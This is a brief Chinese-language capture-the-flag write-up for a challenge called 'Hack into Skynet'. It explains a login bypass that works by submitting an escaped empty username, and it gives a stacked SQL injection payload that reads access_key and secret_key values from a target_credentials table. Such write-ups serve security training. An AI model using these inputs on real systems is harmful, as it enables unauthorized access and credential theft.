# Hack into Skynet

阅读源码后可以发现逻辑漏洞，通过提交username=\&password=xxx的方式绕过登录验证。

跳转路由到/下，阅读源码，可以发现存在字符串拼接型的查询语句，可以通过一下方式查询并获取flag：

```
xxx';select access_key,secret_key from target_credentials offset '0
```